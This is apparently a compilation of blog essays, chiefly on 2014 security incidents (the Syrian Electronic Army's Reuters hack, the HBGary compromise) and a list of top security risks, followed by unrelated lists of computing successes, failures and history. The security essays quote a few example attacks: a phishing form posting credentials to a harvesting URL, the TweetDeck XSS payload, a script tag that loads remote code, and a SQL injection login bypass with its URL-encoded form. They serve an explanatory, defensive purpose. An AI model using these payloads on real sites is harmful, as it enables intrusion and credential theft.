Forget Bombs and Guns … this is the new Battle Field

Introduction

Anonymous faceAs we have seen in Russia’s suspected cyber attack on Web sites in Estonia, and in the Arab Spring uprising, the Internet is playing an increasing part within conflicts around the World. Thus as we move into an Information Age, the battle field of the future is likely to be in Cyber Space, along with this it will also be the place where nation states will struggle to control news outlets.

Over the centuries, information has often been controlled by traditional media outlines, where viewpoints on whether organisations and individuals are seen generally as threats is defined by the government of the time. On the Internet, national boundaries have become blurred, and the control that any nation can have of dissemination on the Internet has been eroded, especially in the openness of platforms such as Twitter, Facebook, and also on news Web sites. This article outlines how the Syrian Electronic Army (SEA), a pro-Assad group of “hacktivists”, with its limited resources, managed to compromise one of the leading news agencies in the World, and not by directly compromising their site, but an associated one. This expands the scope of compromises from not just sites operated by organisations, but also to their trusted partners.

Reuters Hack

Over the weekend (at 12noon on Sunday 22 June 2014) this was highlighted by the SEA redirecting users to a page which stated:

Stop publishing fake reports and false articles about Syria!UK government is supporting the terrorists in Syria to destroy it. Stop spreading its propaganda.

The target, though, was not the Reuters site, but on the content it hosted, and which is used by many other media outlets. This has happened in other related hacks on sites, such as with the New York Times, where the SEA went after the domain name servers of the New York Times and Twitter, though the registry records of Melbourne IT. Thus when a user wanted to go to the New York Times site, they were re-directed to a page generated by the SEA.

In the case over the weekend, the web advertising site Taboola was compromised, and which could have serious consequences for their other clients, who include Yahoo!, the BBC and Fox News. With the increasing use of advertising material on sites, it will be great worry to many sites that messages from hacktivists could be posted through them. Previously, in 2012, Reuters was hacked by the SEA (Syrian Electronic Army) who posted a false article on the death of Saudi Arabia’s foreign minister Saud al-Faisal.

In a previous hack on The Onion, the SEA used one of the most common methods of compromise: a phishing email. With this a person in the company clicked on the malicious link for what seemed to be a lead story from the Washington Post story. Unfortunately it re-directed to another site and then asked for Google Apps credentials. After which, SEA gained access to the Web infastructure and managed to post a story.

It is possible that this attack on Reuters is based on this type of compromise, as it is fairly easy to target key users, and then trick them into entering their details. Often the phishing email can even replicate the local login to an intranet, but is actually a spoofed version. In the case of The Onion, SEA even gained access to their Twitter account.

In classic form, The Onion, on finding the compromise, posted and article leading with:

Syrian Electronic Army Has A Little Fun Before Inevitable Upcoming Death At Hands of Rebels.”

While it took a while for The Onion to understand what had happened on their network, Reuters detected the compromise, and within 20 minutes the content had been fixed.

A cause or a fight?

Organisations need to understand that there are new risks within the Information Age and there are new ways to distribute messages, especially from those who are skillful enough to be able to disrupt traditional forms for dissemination. Thus Hacktivism can become a threat to any nation state and organisation (Figure 1).

Slide3Figure 1: Security is not just technical, it is also Political, Economic, and Social

The important thing to note about Hacktivism is that the viewpoint on the Hacktivist will often be reflected on the political landscape of the current time, and that time itself can change this viewpoint. While Adolf Hitler and Benito Mussolini are still rightly seen as terror agents, Martin Luther King and Mahatma Gandhi are now seen as freedom fighters. Thus viewpoints often change and for some the Hacktivist can have the image of a freedom fighter.

Slide6Figure 2: Hacktivism

Big v Little

The Internet supports a voice for all, and there are many cases of organisations and national states upsetting groups around the World, and where they have successful rebelled against them. In 2012, Tunisian Government web sites were attacked because of Wikileaks censorship, and in 2011, the Sony Playstation Network was hacked after Sony said they would name and shame the person responsible for jail breaking their consoles (Figure 3). It can be seen that just because you are small on the Internet, doesn’t mean you cannot have a massive impact. Sony ended up losing billions on their share price, and lost a great deal of customer confidence.

Slide7Figure 3: Hacktivism examples

HBGary Federal

The HBGary Federal example is the best one in terms of how organisations need to understand their threat landscape. For this Aaron Barr, the CEO of HBGary, announced that they would unmask some of the key people involved in Anonymous, and contacted a host of agencies, including the NSA and Interpol. Anonymous bounced a message back saying that they shouldn’t do this, as they would go after them. As HBGary were a leading security organisation, they thought they could cope with this and went ahead with their threat.

Anonymous then searched around on the HBGary CMS system, and found that a simple PHP request of:

http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27

give them access to the complete database of usernames and hashed passwords for their site. As the passwords were not salted, it was an easy task to reverse engineer the hashes back to the original password. Their target, though, was Aaron Barr and Ted Vera (COO), each of which used weak passwords of six characters and two numbers, which are easily broken.

Now they had their login details, Anonymous moved onto other targets. Surely they wouldn’t have used the same password for their other accounts? But when they tried, the can get access to a while range of their accounts using the same password (including Twitter and Gmail). This allowed Anonymous access to GBs of R&D information. Then the noticed that the System Administrator for their Gmail Email account as Aaron, and managed to gain access to their complete email system, and which included the email system for the Dutch Police.

Slide9Figure 4: Access to email and a whole lot more.

Finally they went after their top security expert: Greg Hoglund, who owned HBGary. For this they send him an email, from within the Gmail account, from a system administrator, and asking for confirmation on a key system password, of which Greg replied back with it. Anonymous then went onto compromise his accounts, and which is a lesson for many organisations. While HBGary Federal has since been closed down, due to the adverse publicity around the hack, the partner company (HBGary) has went from strength-to-strength, with Greg making visionary presentations on computer security around the World.Slide10Figure 5: Greg’s compromise.

 

Conclusions

A likely focus of the intrusion is around a spear phishing email, where users are tricked into entering their user details, which allows the intruder to gain access to privileged systems. The worry for this compromise is that the Reuters site integrates over 30 third-party/advertising network agencies into its content, and a breach on any of these could compromise their whole infrastructure.

I am a technologist and not a political analyst, so I couldn’t make any political judgments around Hacktivism, but HBGary shows us a few things:

  • Use strong passwords.
  • Never re-use passwords.
  • Patch systems.
  • Watch-out of social engineering.
  • Beware of unchecked Web sites.
  • Get an SLA (Service Level Agreement) from your Cloud provided. Organisations need to react quickly on a data breach, especially for email, and an SLA should state how quickly the Cloud provider will react to requests for a lockdown of sensitive information, along with providing auditing information to trace the compromise.
  • Don’t store emails in the Cloud.
  • Test your Web software for scripting attacks.

And for the Internet providing mechanisms for those with a grievance to air their viewpoint, well some would say that individuals have rights to give their viewpoints, while others will say that their viewpoints are a threat against society, so it’s important for us all to make up our own minds, and for us to assess each on its merit.

Top 10 Real Security Risks of 2014

Introduction

There are lot of Top 10 security risks for the year, so I thought I’d collect mines, and give a few that are maybe obvious, and some that are not so much. We have been through many phases of security risks, from worms and viruses, and now we are seeing more targeted attacks, with a focus, typically, on getting user details. The following define some key security risks for both society and users.

Top 10 Real Security Risks

So here are the Top 10 Security Risks, in order of importance:

bot1. Spear Phishing. I’ve put this one at Number 1, as it is one of the most significant risks at the current time, as you can put all the security in place that you like, but if a user clicks on a link with a piece of malware, there’s not much any defence can do. The spear part is significant, as increasing spamming is target, from just knowing that your email address is active, to a targeted email which matches the bank that you use. As you can see in Figure 1, this is a phishing email that actually looks quite valid, and they have avoided using a hyperlink in the body of the email (thus avoiding a rollover on the link. In this case the tricking of the user is done in the HTML file attached, which tends to be a less malicious attachment than other types, such as for Word documents and Flash files. When the user clicks on the HTML file they are greeted with a nicely formatted page which looks exactly like the HMRC page. This is a carbon copy, as they have scrapped the page from the real site, and then changed on small thing:

<form action="http://eneperi.com/Eusk/done.php" name="processForm" method="POST" 
onsubmit="return submitIt(this)">

which will submit all the details you have entered into http://eneperi.com/Eusk/done.php. As you may expect, it doesn’t exist anymore, as the harvesting agent is long since gone.

Screen Shot 2014-06-22 at 15.25.21Figure 1: Example of a spear phishing email.

bug2. Unpatched Systems. Apart from users clicking on links, which most systems can do very little about, it is unpatched systems which gives us the greatest threat. With this, there can be a well-known vulnerability, and where someone has written a piece of software which can exploit it. Just this what happened with Heartbleed, where a vulnerability was found in the protocol used for the heartbeat signal between two systems in a secure connection. Within hours the Internet was full of Python scripts which exploited the vulnerability, and in which anyone from home land defence agents to script kiddies could use. After this it was a matter of finding systems to exploit. So for many administrators it is a continual fight to patch and fix problems. But it is the home users who are typically the sloppiest, and it is three main threats which expose them most: CVE-2013-5331 (Adobe Flash), CVE-02007-0071 (Adobe PDF) and CVE-2013-1723 (Java). If a user has an unpatched system, they can be exposed to each of these vulnerabilities. The threats are fairly easy to implement for script kiddies using exploit kits such as the Phoenix Exploit Kit v2.5, which has all the scripts required to create the documents and the code required to exploit the user’s machine (Figure 2). There’s a whole industry in exploit kits, where, for a maintenance fee, the Exploit Kit creators will patch their exploits to make use of the most up-to-date vulnerabilities, and try and overcome some of the patches applied by venders.

Slide24Figure 2: Unpatched systems

Mining Man3. Botnets. It may shock you, but there are a whole army of zombies out there, who are given tasks by their master, and will blindly carry it out with little thought on the bandwidth or processing power they are consuming. What is being created is one of the largest distributed data harvesting systems every created, and they are waiting for you, or who wants to communicate with them, to do their harvesting. Many thing they are out there just for user details, but there are a whole lot of other ones who are out there harvesting whatever information that the master has defined them. Remember, I can automated a task to do a look-up on a domain name, in order to gain an IP address, by getting a bot to call up a domain name service from a Web site. Here’s an example from the logs on my site. For some reason, a bot has decided it wants to get my site to resolve a range of domain names to IP addresses, and tries to call /ip/whole with the correct parameter of site=”sitename”. The log shows that it gets a 404 message, which means the page does not exist (as I got rid of it), but the bot blindly just keeps going, with a different IP address for every access, so it’s very difficult to block:

2014-06-21 00:00:02 10.185.7.7 GET /ip/whois site=studentconference.net 80 - 198.50.161.59   
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 31
2014-06-21 00:00:07 10.185.7.7 GET /ip/whois site=isaev.info 80 - 71.211.183.241 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 140
2014-06-21 00:00:07 10.185.7.7 GET /ip/whois site=gosonicgo.com 80 - 167.88.115.209 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 155
2014-06-21 00:00:09 10.185.7.7 GET /ip/whois site=ledgewood.com 80 - 50.23.115.95 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 202

The Zeus botnet, for example, makes use of the vulnerabilities given at No 2 (unpatched systems – Flash, PDF and Java), to harvest data from the user’s machine in order to gather it within its network, where the user’s machine becomes a client for gathering information. This can include screen captures of users entering their password characters when the log-into the bank account. As long as someone has a compromised machine on the Internet, there will be botnet. With masses of Windows XP, Windows ME, and so on, with lots of unpatched systems, there will be more places for bots to hide, and not less. Stopping them is almost impossible, as the code for creating these systems is well known, and it takes very little skills to go ahead and create your own one.

Anonymous face4. XSS (Cross-site scripting). Last week, TweetDeck started to spam tweets across the Internet, and it was caused by adding a heart symbol (♥) to the tweet, which caused the system to run a script within TweetDeck, and send a message to the user, and re-tweet links which had just arrived:

<script class="xss">$('.xss').parents().eq(1).find('a').eq(1).click();
$('[data-action=retweet]').click();alert('XSS in Tweetdeck')</script>♥

This highlights the current problem were Web developers spend very little time on analysing the user input for malicious code It simple use it just where a value is taken from the user input, and echo’ed straight to the Web page without checking, so when the user enters:

<script>alert(‘Oops I have been compromised’);</script>

it then echoed to the page, and, of course, will run the scripts as a piece of Javascript, and display a message box with “Ooops I have been compromised“. A common method of breaching a page is where unchecked user input is used to inject malicious code from a remote site. For example:

<script src="http://1.2.3.4/test.js"></script>

will inject some malicious code from a server at 1.2.3.4 into the page, which can cause a whole range of problems, such as breaching the login requirements for a page (see the demo for this).

Many Web sites use LAMP – Linux, Apache, MySQL and PHP. This often uses PHP code to send SQL requests to a MySQL database. A typical call to a database is:

SELECT * FROM accounts WHERE username=’$admin’ AND password=’$pass’

And where the users enters “admin” and “password” gives:

SELECT * FROM accounts WHERE username=’admin’ AND password=’password‘

Then an intruder could change this to:

SELECT * FROM accounts WHERE username=’admin’ AND password=’’ OR 1=1 – ‘

Which will always return a true for the match. To achieve this enter the following as a password:

‘ OR 1=1 --

And convert this to a URL string:

%20%27%20%4f%52%20%31%3d%31%20%2d%2d%20

When this is injected into the URL request for the page, it will show all the usernames and passwords on the database. There is almost an infinite number of these exploits, and an intruder will generally play around with a canary (forcing some text into the input and observing what happens).

5 Scare Stories in the Media. The main headline story on the BBC a few weeks ago was:

People have two weeks to protect themselves from 'powerful computer attack'

botand little has happened since. In fact the Zeus botnet infrastructure has been around for quite a while, and happily gathering information on users. So the shocking headline seems to imply that something big is happening, and it can only be constrained for two weeks, and then it’ll explode. I think the headline feels like we are being told that a bomb is going to go off in two weeks, and you’ve got that time to get protection in place.

In this case, the Zeus bomb, and all the associated botnets, went off some time ago, and there’s very little that can be done about stopping them. The key thing is that users look after themselves better on-line, and not that there is a single piece of software that can thwart all the Zeus-related threats. As long as there is one unpatched Windows XP system around, there’s a hiding place for a bot. As these bots are using peer-to-peer systems to find their master, the botnet master can appear anywhere, and rally their troops on their harvesting exercises. So grabbing hold of a few bot masters, and strangling them, is not really going to cause any long term damage to their infrastructure. In fact, it almost feels like the Internet is becoming alive, with its own in-built eco-system.

While Heartbleed was real and new, the new threats of the Zeus botnet are not actually new. When it comes down to it, on the Internet, the true threats are the well known vulnerabilities that are fixed by users patching their systems, and not necessarily people rushing to update their virus scanners. Patch your system, and you are much less exposed than updating your virus scanner. So the threat is not a new one, and the “two weeks to an explosion” is really not precise. So a stronger message could be to define what a user should observe in a phishing email – don’t click on links in HMRC emails – and patch your system. In fact, don’t click on any email links unless you know they are fully trusted.

The paper published on the Zeus botnet goes back to 2011 where a university academic group managed to take-over the Zeus network, and analysed the username, passwords and credit card details of users. With the latest threat, we are told that someone, somewhere is holding back the tide, and they can only do this for two weeks, and then it will be unleashed. I think this could be hype, especially in gear up activity within the security community.

Connected People in Network6. Critical Infrastructure Failure. The dependency on the Internet becomes more apparent every day, and many users and business fail to see that the access to it, and it’s services are dependent on critical infrastructures. A failure in one part of an interconnected system can cause the whole thing to collapse. An example has happened recently where Anonymous took over GoDaddy’s domain name service because it supported the Stop Online Piracy Act in the US (which is a Congressional bill which allows copyright owners to gain court orders to take sites offline for practicing or aiding piracy). It should be remember that critical infrastructure can be seen as anything which the whole system depends on, so electrical power, domain name services, identity services, IP address allocation, networked devices, and so on, or all part of this infrastructure, and need to be protected. The easy way is to setup a failover, where if a critical device or server, then a new one will replace it. This, though, is often a hard sell to the CEO, where a system administrator will be asked, “What benefit does it have?”, … “Well if one goes down, it replaces it!”, … “Well … I can’t see the business case in that”. So it is up to us all, to make sure that our critical infrastructure protection is in-place, in the same way that we would put in protection for our physical world.

Large safe, open7. Resistance to Change. This might seem a strange one to add, but one of our great threats is a resistance to change our existing systems because of security problems. This is seem in health and social care in the UK, where there is virtually no access for users to either own health and social care records, and very little governance of the sharing of information across disparate systems. Every headline of health records being breached, sets back the agenda of getting systems on-line. Often it is a naive debate, where we have an all or nothing approach, but there are so many services which could go on-line now, and have low risks associated with them. Our risk is thus to keep all our data behind existing barriers, and not look to re-architect to properly integrate users with their own data. In 2013, in the US, there were over 619 health care related incidents of over 40 million records disclosed. This must be seen as a problem mainly related to the way we have built our systems and where we put the data. Only with a re-think will we be able to keep highly sensitive information under strong security control, and less around others. To be able to view your inoculations, or book appointments with GPs, seem such as trivial thing, and should be a top priority for any modern information nation.

Remember, just because something is a risk, it is no real reason for that only to be the thing to stop its development. There can be so many blockers in the way, and it needs leadership to push against these blockers. One I heard was that it would not be possible to Skype with a GP, as Skype was seen as a security risk. Surely, everything is a security, and it’s a balance to benefit against risk? The risk of an ill person getting on public transport must overrule any small risks around Skype, and its associated protocols. In Scotland, the Scottish Government has put a target of 2020 for getting health care records on-line … the question that must be asked … why does it take so long and can’t we get some simple things on-line first? From the work we have done, repeat prescriptions and booking appointments with clinicians are two of the most popular on-line services which users want. But ask yourself … when was the last time you were asked about what you wanted from your health care services … and if the answer is “Never” then you should worry!

8. IP Theft. In the past the greatest threat was from outsiders probing systems. As firewalls have become smarter, and with the increasing use of NAT (Network Address Translation), which hides the internal network to external access, it has become more difficult to gain a foothold on a system. The greatest threat is that once an intruder is inside the network, they can generally move around the system, and steal IP (Intellectual Property) with few barriers in their way. Many companies struggle to know exactly what their IP actually is, and were it is stored and how access to it is controlled. Thus, companies need to known where their secrets are stored, especially when it is stored in open source areas, such as with Dropbox. A simple method of username and password is often not sufficent enough to protect key IP assets, and where multi-factor access is key to enhanced protection. Companies also need to avoid just using knowledge as the key barrier for access to an asset. Ask a user for their date of birth these days, is almost like asking a null question, where everyone’s birthday can be determined from open source searches. Out-of-band authentication, such as with SMS Pin codes to a mobile device, are key to verifying user access to sensitive information.

9. Big Brother. This might not seem an obvious security risk, but the gathering and aggregation is becoming simpler, and are often few barriers within existing public sector systems to stop users gaining access to privileged information that can be brought together. On the one hand we have the rights to privacy, and on the other hand we have the risks to society, and many countries are now struggling to balance the two, where a properly defined governance infrastructure can be setup to protect the rights of the individual, while also detecting risks around copyright breaches, tax evasion, child protection, and so on. We must worry whenever we see new systems being put in-place which gather information, and for their to be little discussion on how they are being used, and how citizens will be integrated into them. Any system which says it is gathering information around citizens because there is a generally defined risk, must be open to review to make sure the system itself is secure, and that the gathering is worth it. As we move into an age where data is never really deleted, or where the veracity of it is checked, we could have a whole lot of data what can be used for purposes that it was not intended for, and that could be incorrect.

10. Lack of standards in Security Education. The final risk is also a strange one, but just as important as the others. As a personal observation, I’ve seen too many graduates who seem to have very little understanding of some core principles around security. We have done many job interviews, and have seen PhD and MSc graduates struggle to even articulate the basics of even private key cryptography. This can be likened to an electrician not being able to select the right fuse to go into a plug, or struggle to calculate the current in a circuit based on the applied voltage and resistance. So you may worry about the actual security of systems, especially in its software and hardware infrastructure, where software engineers often do not get any formal education in cryptography or even the basics of hashing passwords.

And those that just missed the Top 10:

  • The evil of the Internet. The Internet we have created is amazing in terms of the access it provides for every citizen in the World, but also allows a platform for those with a grievence, and for those who do not properly understand the damage that their comments can make to the individuals involved. As Cyberbullying starts to be seen as a crime, it should hopefully stop those who post vile comments, and for them to understand that the countries of the World are teaming together to try pin-point individuals and being them to justice.
  • Identity Theft. A kids about the thing that worries them most on the Internet, and they will often say that it is someone stealing their identity. As we focus increasing on a single identity, our own identity becomes key, and users must protect it in whatever way possible.
  • Not putting the citizen at the centre of systems. As we re-architecture own on-line public services, the citizen must be placed at the centre of the designs, and for services to be build around them. Too often, in the past, have barriers been put in-place for lack of computer literacy, but the Apple iPad has changed this, and there is now few reasons for supporting on-line systems which not only integrate citizen, but also their families, who are often as much the key carers, as other more formal roles.
  • DDoS. Very popular as a tool of choice for many with a grievance against a company, but as high-risk organisations are moving to 24×7 defence support, in Security Operations Centres, the defences are not in-place to thwart these.

Top 15 Underachievers in IT

I used to write a lot of books … but I’ve moved to creating Web material, which is easier to update. From the past, here’s one of my essays I did many years ago …

When it comes to failures, there are no failures really, and it is easy to be wise after the event. Who really knows what would have happened if the industry had taken another route? So instead of the Top 15 failures, I’ve listed the following as the Top 15 under-achievers (please forgive me for adding a few of my own, such as DOS and the Intel 8088):

1. DOS, which became the best selling, standard operating systems for IBM PC systems. Unfortunately, it held the computer industry back for at least ten years. It was text-based, command-oriented, had no graphical user interface, could only access up to 640KB, it could only use 16 bits at a time, and so on, …. Many with a short memory will say that the PC is easy to use, and intuitive, but they are maybe forgetting how it used to be. With Windows 95 (and to a lesser extent with Windows 3.x), Microsoft made computers much easier to use. From then on, users could actually switch their computer on without have to register for a high degree in Computer Engineering. DOS would have been fine, as it was compatible with all its previous parents, but the problem was MAC OS, which really showed everyone how a user interface should operate. Against this competition, it was no contest. So, what was it? Application software. The PC had application software coming out of its ears.

S_Intel-D8088-22. Intel 8088, which became the standard processor, and thus the standard machine code for PC applications. So why is it in the failures list? Well, like DOS, its because it was so difficult to use, and was a compromised system. While Amiga and Apple programmers were writing proper programs which used the processor to its maximum extent, PC programs were still using their processor in ‘sleepy-mode’ (8088-compatiable mode), and could only access a maximum of 1MB of memory (because of the 20-bit address bus limit for 8088 code). The big problem with the 8088 was that it kept compatibility with its father: the 8080. For this Intel decided to use a segmented memory access, which is fine for small programs, but a nightmare for large programs (basically anything over 64KB).

3. Alpha processor, which was DEC’s attack on the processor market. It had blistering performance, which blew every other processor out of the water (and still does). It has never been properly exploited, as there is a lack of development tools for it. The Intel Pentium proved that it was a great all-comer and did many things well, and was willing to improved the bits that it was not so good at.

4. Z8000 processor, which was a classic case of being technically superior, but was not compatible with its father, the mighty Z80, and its kissing cousin, the 8080. Few companies have given away such an advantage with a single product. Where are Zilog now? Head buried in the sand, probably.

images5. DEC, who were one of the most innovate companies in the computer industry. They developed a completely new market niche with their minicomputers, but they refused, until it was too late, that the microcomputer would have an impact on the computer market. DEC went from a company that made a profit of $1.31 billion in 1988, to a company which, in one quarter of 1992, lost $2 billion. Their founder, Ken Olsen, eventually left the company in 1992, and his successor brought sweeping changes. Eventually, though, in 1998 it was one of the new PC companies, Compaq, who would buy DEC. For Compaq, DEC seemed a good match, as DEC had never really created much of a market for PCs, and had concentrated on high-end products, such as Alpha-based workstations and network servers.

6. Fairchild Semiconductor. Few companies have ever generated so many ideas and incubated so many innovative companies, and got little in return.

index7. Xerox. Many of the ideas in modern computing, such as GUIs and networking, were initiated at Xerox’s research facility. Unfortunately, Xerox lacked force to develop them into products, maybe because they reduced Xerox’s main market, which was, and still is, very much based on paper.

8. PCjr, which was another case of incompatibility. IBM lost a whole year in releasing the PCjr, and lost a lot of credibility with their suppliers (many of whom were left with unsold systems) and their competitors (who were given a whole year to catch-up with IBM).

9. OS/2, IBM’s attempt to regain the operating system market from Microsoft. It was a compromised operating system, and their development team lacked the freedom of the original IBM PC development. Too many people and too many committees were involved in its development. It thus lacked the freedom, and independence that the Boca Raton development team had. IBM’s mainframe divisions were, at the time, a powerful force in IBM, and could easily stall, or veto a product if it had an effect on their profitable market.

10. CP/M, which many believed would because the standard operating system for microcomputers. Digital Research had an excellent opportunity to make it the standard operating system for the PC, but Microsoft overcame them by making their DOS system much cheaper.

11. MCA, which was the architecture that IBM tried to move the market with. It failed because Compaq, and several others, went against it, and kept developing the existing architecture.

12. RISC processors, which were seen as the answer to increased computing power. As Intel as shown, one of the best ways to increase computing speed is to simply ramp-up the clock speed, and make the busses faster.

13. Sinclair Research, who after the success of the ZX81 and the Spectrum, threw it all away by releasing a whole range of under-achievers, such as the QL, and the C-5.

14. MSX, which was meant to be the technology that would standardize computer software on PCs. Unfortunately, it hadn’t heard of the new 16-bit processors, and most of all, the IBM PC.

2.1-os215. Lotus Development, who totally misjudged the market, by not initially developing their Lotus 1-2-3 spreadsheet for Microsoft Windows. They instead developed it for OS/2, and eventually lost the market leadership to Microsoft Excel. Lotus also missed an excellent opportunity to purchase a large part of Microsoft when they were still a small company. The profits on that purchase would have been gigantic.

Here is my Top 15 successes in the computer industry:

1.    IBM PC
(for most), which was a triumph of design and creativity. One of the few computer systems to ever to be released on time, within budget, and within specification. Bill Gates must take some credit in getting IBM to adopt the 8088 processor, rather than 8080. After its success, every man and his dog had a say in what went into it. The rise of the bland IBM PC was a great success of an open-system over closed-systems. Companies who have quasi-monopolies are keen on keeping their systems closed, while companies against other competitors prefer open systems. The market, and thus, the user, prefers open-systems.

2.    TCP/IP, which is the standard protocol used by computers communicating over the Internet. It has been designed to be computer independent to any type of computer, can talk to any other type. It has withstood the growth of the Internet with great success. Its only problem is that we are now running out of IP addresses to grant to all the computers that connect to the Internet. It is thus a victim of its own success.

3.    Electronic mail, which has taken the paperless office one step nearer. Many mourned the death of the letter writing. Before email, TV and the telephone had suppressed the art of letter writing, but with email it is back again, stronger than ever. It is not without its faults, though. Many people have sent emails in anger, or ignorance, and then regretted them later. It is just too quick, and does not allow for a cooling off period. My motto is: ‘If your annoyed about something. Sleep on it, and send the email in the morning’. Also, because email is not a face-to-face communicate, or a voice-to-voice communication, it is easy to take something out of context. So another motto is: ‘Careful read everything that you have written, and make sure there is nothing’. Only on the Internet could email address be accepted, world-wide, in such a short time.

4.    Microsoft, who made sure that they could not loose in the growth of the PC, by teaming up with the main computer manufacturers, such as IBM (for DOS and OS/2), Apple (for Macintosh application software) and for their own operating system: Windows. Luckily for them it was their own operating system which became the industry standard. With the might of having the industry-standard operating system, they captured a large market for industry-standard application programs, such as Word and Excel.

5.    Intel, who was gifted an enormous market with the development of the IBM PC, but have since invested money in enhancing their processors, but still keeping compatibility with their earlier ones. This has caused a great deal of hassle for software developers, but is a dream for users. With processors, the larger the market you have, the more money you can invest in new ones, which leads to a larger market, and so on. Unfortunately, the problem with this is that other processor companies can simply copy their designs, and change them a little so that they are still compatible. This is something that Intel have fought against, and, in most cases have succeed in regaining their market share, either with improved technology or through legal action. The Pentium processor was a great success, as it was technologically superior to many other processors in the market, even the enhanced RISC devices. It has since become faster and faster.

6.    6502 and Z80 processors, the classic 16-bit processors which became a standard part in most of the PCs available before the IBM PC. The 6502 competed against the Motorola 6800, while the Z80 competed directly with the Intel 8080.

7.    Apple II, which brought computing into the class room, the laboratory, and, even, the home.

8.    Ethernet, which has become the standard networking technology. It is not the best networking technology, but has survived because of its upgradeabliity, its ease-of-use, and its cheapness. Ethernet does not cope well with high capacity network traffic. This is because it is based on contention, where nodes must contend with each other to get access to a network segment. If two nodes try to get access at the same time, a collision results, and no data is transmitted. Thus the more traffic there is on the network, the more collisions there are. This reduces the overall network capacity. However, Ethernet had two more trump cards up its sleeve. When faces with network capacity problems, it increased its bit rate from the standard 10Mbps (10BASE) to 100Mbps (100BASE). So there was ten times the capacity which reduced contention problems. For networks backbones it also suffered because it could not transmit data fast enough. So, it played its next card: 1000BASE. This increased the data rate to 1Gbps (1000MBps). Against this type of card player, no other networking technology had a chance.

9.    Web, which is often confused with the Internet, and is becoming the largest data infastructure ever created.. The Web is one of the uses of the Internet (others include file transfer, remote login, electronic mail, and so on).

10.    Apple Macintosh, which was one of few PC systems which competed with the IBM PC. It succeeded mainly because of its excellent operating system (MAC OS), which was approximately 10 years ahead of its time. Possibly if Apple had spent as much time in developing application software rather than for their operating system it would have considerably helped the adoption of the Mac. Apple refusing to license it to other manufacturers also held its adoption back. For a long time it thus stayed a closed-system.

11.    Compaq DeskPro 386. Against all the odds, Compaq stole the IBM PC standard from the creators, who had tried to lead the rest of the industry up a dark alley, with MCA.

12.    Sun SPARC, which succeed against of the growth of the IBM PC, because of its excellent technology, its reliable Unix operating system, and its graphical user interface (X-Windows). Sun did not make the mistakes that Apple made, and allowed other companies to license their technology. They also supported open systems in terms of both the hardware and software.

13.    Commodore, who bravely fought on against the IBM PC. They released mainly great computers, such as the Vic range and the Amiga. Commodore was responsible for forcing the price of computers.

14.    Sinclair, who, more than any other company, made computing acceptable to the masses. Okay, most of them had terrible membrane keyboards, and memory adaptor that wobbled, and it took three fingers to get the required command (Shift-2nd Function-Alt-etc), and it required a cassette imagesrecorder to download program, and it would typically crash after you had entered one thousand lines of code. But, all of this aside, in the Sinclair Spectrum they found the right computer, for the right time, at the right price. Sometimes success can breed complacency, and so it turned out with the Sinclair QL and the Sinclair C-5 (the electric slipper).

15.    Compaq, for startling growth, that is unlikely to be ever repeated. From zero to one billion dollars in five years. They achieved their growth, not by luck, but by shear superior technology, and with the idea of sharing their developments.

So, apart from the IBM PC, what are the what are the all-time best computers. A list by Byte in September 1995 stated the following:

1.       MITS Altair8800
2.       Apple II
3.       Commodore PET
4.       Radio Shack TRS-80
5.       Osborne 1 Portable
6.       Xerox Star
7.       IBM PC
8.       Compaq Portable
9.       Radio Shack TRS-80 Model 100
10.    Apple Macintosh    11.    IBM AT
12.    Commodore Amiga 1000
13.    Compaq Deskpro 386
14.    Apple Macintosh II
15.    Next Nextstation
16.    NEC UltraLite
17.    Sun SparcStation 1
18.    IBM RS/6000
19.    Apple Power Macintosh
20.    IBM ThinkPad 701C

And the Top 10 computer people as:

1.    DAN BRICKLIN (VisiCalc)
2.    BILL GATES (Microsoft)
3.    STEVE JOBS (Apple)
4.    ROBERT NOYCE (Intel)
5.    DENNIS RITCHIE (C Programming)
6.    MARC ANDREESSEN (Netscape Communications)
7.    BILL ATKINSON  (Apple Mac GUI)
8.    TIM BERNERS-LEE (CERN)
9.    DOUG ENGELBART (Mouse/Windows/etc)
10.    GRACE MURRAY HOPPER (COBOL)
11.    PHILIPPE KAHN (Turbo Pascal)
12.    MITCH KAPOR (Lotus 123)
13.    DONALD KNUTH (TEX)
14.    THOMAS KURTZ
15.    DREW MAJOR (NetWare)
16.    ROBERT METCALFE (Ethernet)
17.    BJARNE STROUSTRUP (C++)
18.    JOHN WARNOCK (Adobe)
19.    NIKLAUS WIRTH (Pascal)
20    STEVE WOZNIAK (Apple)

One of the classic comments of all time was by Ken Olson at DEC, who stated, “There is no reason anyone would want a computer in their home.” This seems farcical now, but at the time, in the 1970s, there were no CD-ROMs, no microwave ovens, no automated cash dispensers, and no Internet. Few people predicted them, so, predicting the PC was also difficult. But the two best comments were:

“Computers in the future may weigh no more than 1.5 tons.” Popular Mechanics
“I think there is a world market for maybe five computers”, Thomas Watson, chairman of IBM, 1943

From John Napier to the Millenium Bug

Before the Internet really took off, here was my quick history of the computer:

images1614    John Napier discovered logarithms, which allowed the simple calculation of complex multiplications, divisions, square roots and cube roots.
1642    Blaise Pascal built a mechanical adding machine.
1801    Joseph-Maire Jacuard developed an automatic loom controlled by punched cards.
1822    Charles Babbage designed his first mechanical computer, the first prototype for his difference engine. His model would be used in many future computer systems.
1880s    Hollerith produced a punch-card reader for the US Census.
1896    IBM founded (as the Tabulating Machine Company).
1906    Lee De Forest produces the first electronic value.
1946    ENIAC built at the University of Pennsylvania.
1948    Manchester University produces the first computer to use a stored program (the Mark I).
1948    William Shockley (and others) invents the transistor.
1954    Texas Instruments produces a transistor using silicon (rather than germanium). IBM produces the IBM 650 which was, at the time, the workhorse of the computer indus-try. MIT produces the first transistorized computer: the TX-O.
1957    IBM develops the FORTRAN (FORmula TRANslation) programming language.
1958    Jack St. Clair Kilby proposes the integrated circuit.
1959    Fairchild Semiconductor produces the first commercial transistor using the planar process. IBM produces the first transistorized computer: the IBM 7090.
1960    ALGOL introduced which was the first structured, procedural, language. LISP (LISt Processing) was introduced for the Artificial Intelligence applications.
1961    Fairchild Semiconductor produces the first commercial integrated circuit.
COBOL (COmmon Business-Orientated Language) developed by Grace Murray Hop-per.
1963    DEC produce its first minicomputer.
